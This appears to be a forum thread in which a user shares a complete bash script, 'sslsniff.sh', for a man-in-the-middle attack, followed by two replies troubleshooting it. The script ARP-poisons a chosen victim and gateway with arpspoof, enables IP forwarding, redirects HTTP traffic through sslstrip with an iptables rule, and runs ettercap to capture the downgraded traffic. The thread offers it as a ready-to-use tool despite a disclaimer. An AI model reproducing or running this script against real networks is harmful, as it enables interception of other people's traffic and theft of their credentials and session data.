Results 1 to 3 of 3

Thread: sslsniff.sh

  1. #1
    Just burned his ISO thims's Avatar
    Join Date
    Nov 2009
    Posts
    5

    Default sslsniff.sh

    @admins if you feel this is a duplicate post let me know and delete it I will move back to where this originated, but seeing as revisions, etc. I didnt want to hijack the original post.

    This script is not intended for illegitimate uses, I am in no way responsible for the way you use this, or the decisions you make.

    This is a script I wrote for SSL sniffing.
    ToDO:
    - ensure ip_forward is always set

    General Usage:
    ./sslsniff.sh -v <ip of target> -g <ip of gateway>
    -v and -g are the only required flags, the rest are optional.
    if -s is not specified sslstrip defaults to port 10000
    -h for help

    Download: mediafire.com/?nmtz2tjvuyj
    Code:
    Code:
    #!/bin/bash
    #
    # Synopsis:	A program to sniff traffic in an SSL connection
    # Author:		thims (thims DOT local AT gmail DOT com)
    # Version:	0.3
    # Date:			20091107
    # Comments:	
    #		ToDO:
    
    
    # leave blank simply here for coding style
    victim=
    gateway=
    sslPort=10000
    etterConf=/etc/etter.conf
    
    # print help
    function help() {
    cat << EOF
    Usage: $0 [args] host
        -h, --help     -  Print this help and exit
        -i. --iface    -  Interface to use
        -e, --etconf   -  Location of etter.conf on the filesystem
        -v, --victim   -  IP address of desired host
        -g, --gateway  -  IP address of network gateway
        -s, --sslport  -  Desired port for sslstrip
    EOF
    }
    
    # echo supplied argument and die
    function die() {
    	if [ -n "$1" ] ;then
    		echo "$1"
    	fi
    	exit 1
    }
    
    # nohup wrapper to check if specified program will execute correctly
    function noHup() {
    	cmd="$1"
    	nohup $cmd > /dev/null &> /dev/null &
    	sleep 5
    	# here simply to handle sslstrip because it is ran by python it throws off pidof
    	if [ $(echo "$cmd" | awk -F" " '{print $1}') == "sslstrip" ] ;then
    		pid=$(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}')
    	else
    		pid=$(pidof $(echo "$1" | awk -F" " '{print $1}'))
    	fi
    
    	if [ -z "$pid" ] ;then
    		return 1
    	else
    		return 0
    	fi
    }
    
    # poison the arp
    function spoofMac() {
    	echo -n "Poisoning the victim...."
    	noHup "arpspoof "$iface" -t "$victim" "$gateway""
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate arpspoof. Dieing..."
    	fi
    	echo $(pidof arpspoof) > /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    }
    
    # intercept the SSL cert
    function sslInit() {
    	echo -n "Setting up SSL intercept...."
    	echo 1 > /proc/sys/net/ipv4/ip_forward
    	# ensure that ip_forward is set
    	while [ $(cat /proc/sys/net/ipv4/ip_forward) == 0 ]
    	do
    		echo 1 > /proc/sys/net/ipv4/ip_forward
    	done
    
    	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"
    	noHup "sslstrip -a -f -k -l "$sslPort""
    	if [ $? -gt 0 ] ;then
    		die "Error: could not initiate sslstrip. Dieing..."
    	fi
    	echo $(ps ax | grep python | grep sslstrip | awk -F " " '{print $1}') > /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    }
    
    # capture the responses
    function capture() {
    	# edit ettercap.conf
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/#//' "$etterConf"
    	done
    
    	echo -n "Starting to sniff...."
    	ettercap -T -q "$iface"
    }
    
    # clean up enviroment
    function cleanUp() {
    	echo "Cleaning up...."
    	echo -n "Closing SSL proxy...."
    	kill $(cat /var/run/sslsniff.sslstrip.run)
    	rm /var/run/sslsniff.sslstrip.run
    	echo "Ok"
    	echo -n "Unpoisoning the victim...."
    	kill  -n 2 $(cat /var/run/sslsniff.arpspoof.run)
    	rm /var/run/sslsniff.arpspoof.run
    	echo "Ok"
    	echo -n "Removing iptables rule and ip_forwarding...."
    	iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports "$sslPort"	
    	echo 0 > /proc/sys/net/ipv4/ip_forward
    	echo "Ok"
    	
    	# return etter.conf to the state it was found in 
    	echo -n "Returning etter.conf to the configuration we found it with...."
    	for linNum in $(cat "$etterConf" | grep -in redir | grep iptables | awk -F: '{print $1}')
    	do
    		sed -i $linNum's/^/#/' "$etterConf"
    	done
    	echo "Ok"
    	echo "Have a nice day!"
    }
    
    # initialize the whole shebang
    function initialize() {
      if [ -z "$victim" ] || [ -z "$gateway" ] ;then
        help
        echo
        die "Error: a syntactical one"
    	else
    		echo "Enviroment details:"
    		echo "    Victim:         " "$victim" "  Ok!"
    		echo "    Gateway/Router: " "$gateway" "  OK!"
    		echo "    Interface:      " "$iface" "  OK!"
    		echo "    SSLStrip port:  "	"$sslPort" "  OK!"
    
        spoofMac
        sslInit
        capture
    		cleanUp
      fi  
    }
    
    
    # some CLI ARGS?
    while [ $# -gt 0 ]
    do
    	case "$1" in
    		"-h"|"--help")
    			help
    			die
    		;;
    		"-v"|"--victim")
    			victim="$2"
    		;;
    		"-g"|"--gw")
    			gateway="$2"
    		;;
    		"-s"|"--sslport")
    			sslPort="$2"
    		;;
    		"-i"|"--iface")
    			if [ $(ifconfig "$2" &> /dev/null; echo $?) == 1 ] ;then
    				die "Error: interface "$2" does not exist!"
    			else
    				iface="-i $2"
    			fi
    		;;
    		"-e"|"--etconf")
    			if [ ! -e "$2" ] ;then
    				die "Error: specified ettercap conf does not exist!"
    			else
    				etterConf="$2"
    			fi
    		;;
    		'')
    			help
    			echo
    			die "Error: a syntactical one"
    		;;
    		-*)
    			help
    			echo
    			die "Error: a syntactical one"
    		;;
    	esac
    	shift
    done
    
    
    # main loop
    initialize
    All suggestions, comments, feedback, etc are more then welcome, I would love to hear what you thoughts are.

    Also I take suggestions/requests for scripts.

  2. #2
    Just burned his ISO
    Join Date
    Nov 2009
    Posts
    7

    Default

    I get the error: Incorrect number of token (//) in TARGET !!

  3. #3
    OlympusII
    Guest

    Default sslsniff

    Stove, use /IP Adress/ /Gateway/ and it should work, and then it may quit where mine has.
    I get the following when executing the script:
    bt ~ # sslsniff.sh -v /192.168.1.70/ -g /192.168.1.254/
    Enviroment details:
    Victim: /192.168.1.70/ Ok!
    Gateway/Router: /192.168.1.254/ OK!
    Interface: OK!
    SSLStrip port: 10000 OK!
    Poisoning the victim....Error: could not initiate arpspoof. Dieing...

    I noticed in the script it has /var/run/sslsniff.arpspoof.run. I tried pointing it to /usr/local/sbin/sslsniff.arpspoof.run. No joy there so I removed sslsniff so that it was arpspoof.run, still no joy.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •